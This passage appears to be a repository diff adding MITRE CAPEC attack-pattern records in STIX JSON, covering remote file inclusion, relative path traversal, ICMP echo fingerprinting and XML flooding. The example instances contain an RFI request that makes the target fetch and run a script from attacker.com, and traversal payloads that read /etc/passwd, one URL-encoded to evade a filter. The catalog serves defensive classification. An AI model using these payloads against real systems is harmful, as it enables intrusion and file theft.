"url": "http://cwe.mitre.org/data/definitions/714.html",
"external_id": "CWE-714"
},
{
"source_name": "reference_from_CAPEC",
"description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)",
"url": "http://projects.webappsec.org/Remote-File-Inclusion",
"external_id": "REF-59"
},
{
"source_name": "reference_from_CAPEC",
"description": "Shaun Clowes, A Study In Scarlet, Exploiting Common Vulnerabilities in PHP Applications, Blackhat Briefings Asia 2001",
"url": "http://securereality.com.au/studyinscarlett/",
"external_id": "REF-60"
},
{
"source_name": "reference_from_CAPEC",
"description": "OWASP Top 10 (2007), The Open Web Application Security Project (OWASP)",
"url": "http://www.owasp.org/index.php/Top_10_2007-A3",
"external_id": "REF-45"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Bypass Protection Mechanism"
],
"Accountability": [
"Gain Privileges"
],
"Authentication": [
"Gain Privileges"
],
"Authorization": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Gain Privileges",
"Bypass Protection Mechanism"
],
"Confidentiality": [
"Read Data"
],
"Integrity": [
"Modify Data"
],
"Non-Repudiation": [
"Gain Privileges"
]
},
"x_capec_example_instances": [
"\n <xhtml:div style=\"margin-left:10px;\">\n <xhtml:ul>\n <xhtml:li>The adversary controls a PHP script on a server \"http://attacker.com/rfi.txt\"</xhtml:li>\n <xhtml:li>The .txt extension is given so that the script doesn't get executed by the attacker.com server, and it will be downloaded as text. The target application is vulnerable to PHP remote file inclusion as following: include($_GET['filename'] . '.txt')</xhtml:li>\n <xhtml:li>The adversary creates an HTTP request that passes his own script in the include: http://example.com/file.php?filename=http://attacker.com/rfi with the concatenation of the \".txt\" prefix, the PHP runtime download the attack's script and the content of the script gets executed in the same context as the rest of the original script.</xhtml:li>\n </xhtml:ul>\n </xhtml:div>\n "
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"Target application server must allow remote files to be included in the \"require\", \"include\", etc. PHP directives",
"The adversary must have the ability to make HTTP requests to the target web application."
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_skills_required": {
"Low": "To inject the malicious payload in a web page",
"Medium": "To bypass filters in the application"
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2.json
+81
View File
@@ -0,0 +1,81 @@
{
"type": "bundle",
"id": "bundle--c00b19b5-e532-45a8-8a3d-80269b9993b6",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Relative Path Traversal",
"description": "An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \\) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/139.html",
"external_id": "CAPEC-139"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/23.html",
"external_id": "CWE-23"
},
{
"source_name": "reference_from_CAPEC",
"description": "The OWASP Application Security Desk Reference, 2009, The Open Web Application Security Project (OWASP)",
"url": "https://www.owasp.org/index.php/Path_Traversal",
"external_id": "REF-8"
},
{
"source_name": "reference_from_CAPEC",
"description": "OWASP Testing Guide (v3), 2010, The Open Web Application Security Project (OWASP)",
"url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)",
"external_id": "REF-9"
},
{
"source_name": "reference_from_CAPEC",
"description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)",
"url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal",
"external_id": "REF-10"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Bypass Protection Mechanism"
],
"Availability": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Unreliable Execution"
],
"Confidentiality": [
"Read Data",
"Execute Unauthorized Commands (Run Arbitrary Code)"
],
"Integrity": [
"Modify Data",
"Execute Unauthorized Commands (Run Arbitrary Code)"
]
},
"x_capec_example_instances": [
"\n <xhtml:p>The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"attack\">http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd</xhtml:div>\n <xhtml:p>However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.</xhtml:p>\n <xhtml:p>Then an attacker creates special payloads to bypass this filter:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"attack\">http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd</xhtml:div>\n <xhtml:p>When the application gets this input string, it will be the desired vector by the attacker.</xhtml:p>\n "
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The target application must accept a string as user input, fail to sanitize combinations of characters in the input that have a special meaning in the context of path navigation, and insert the user-supplied string into path navigation commands."
],
"x_capec_skills_required": {
"High": "To bypass non trivial filters in the application",
"Low": "To inject the malicious payload in a web page"
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2e8b387c-3490-4037-be54-cdd3b2897393.json
+80
View File
@@ -0,0 +1,80 @@
{
"type": "bundle",
"id": "bundle--e1bb45f2-2c5d-4dab-a459-71cb25c6e6cb",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2e8b387c-3490-4037-be54-cdd3b2897393",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "ICMP Error Message Echoing Integrity Probe",
"description": "An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the integrity of data returned or \"Quoted\" from the originating request that generated the error message. For this purpose \"Port Unreachable\" error messages are often used, as generating them requires the attacker to send a UDP datagram to a closed port on the target. When replying with an ICMP error message some IP/ICMP stack implementations change aspects of the IP header, change or reverse certain byte orders, reset certain field values to default values which differ between operating system and firmware implementations, and make other changes. Some IP/ICMP stacks are decidedly broken, indicating an idiosyncratic behavior that differs from the RFC specifications, such as the case when miscalculations affect a field value. A tremendous amount of information about the host operating system can be deduced from its 'echoing' characteristics. Notably, inspection of key protocol header fields, including the echoed header fields of the encapsulating protocol can yield a wealth of data about the host operating system or firmware version.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/330.html",
"external_id": "CAPEC-330"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/200.html",
"external_id": "CWE-200"
},
{
"source_name": "reference_from_CAPEC",
"description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
"external_id": "REF-33"
},
{
"source_name": "reference_from_CAPEC",
"description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)",
"url": "http://www.faqs.org/rfcs/rfc792.html",
"external_id": "REF-123"
},
{
"source_name": "reference_from_CAPEC",
"description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10",
"url": "http://www.faqs.org/rfcs/rfc1122.html",
"external_id": "REF-124"
},
{
"source_name": "reference_from_CAPEC",
"description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group",
"url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf",
"external_id": "REF-262"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Bypass Protection Mechanism",
"Hide Activities"
],
"Authorization": [
"Bypass Protection Mechanism",
"Hide Activities"
],
"Confidentiality": [
"Read Data",
"Bypass Protection Mechanism",
"Hide Activities"
]
},
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."
],
"x_capec_resources_required": [
"A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.."
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2ebcd4aa-44ae-47e0-9c76-c99c71990a09.json
+54
View File
@@ -0,0 +1,54 @@
{
"type": "bundle",
"id": "bundle--6bf0912c-e4ee-4fc3-b4b7-aed63e9f1a47",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2ebcd4aa-44ae-47e0-9c76-c99c71990a09",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "XML Flood",
"description": "An adversary may execute a flooding attack using XML messages with the intent to deny legitimate users access to a web service. These attacks are accomplished by sending a large number of XML based requests and letting the service attempt to parse each one. In many cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing. XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/528.html",
"external_id": "CAPEC-528"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/770.html",
"external_id": "CWE-770"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_alternate_terms": [
"XML Denial of Service (XML DoS)"
],
"x_capec_consequences": {
"Availability": [
"Resource Consumption"
]
},
"x_capec_example_instances": [
"Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service."
],
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"The target must receive and process XML transactions.",
"An adverssary must possess the ability to generate a large amount of XML based messages to send to the target service."
],
"x_capec_skills_required": {
"Low": "Denial of service"
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}

Some files were not shown because too many files have changed in this diff Show More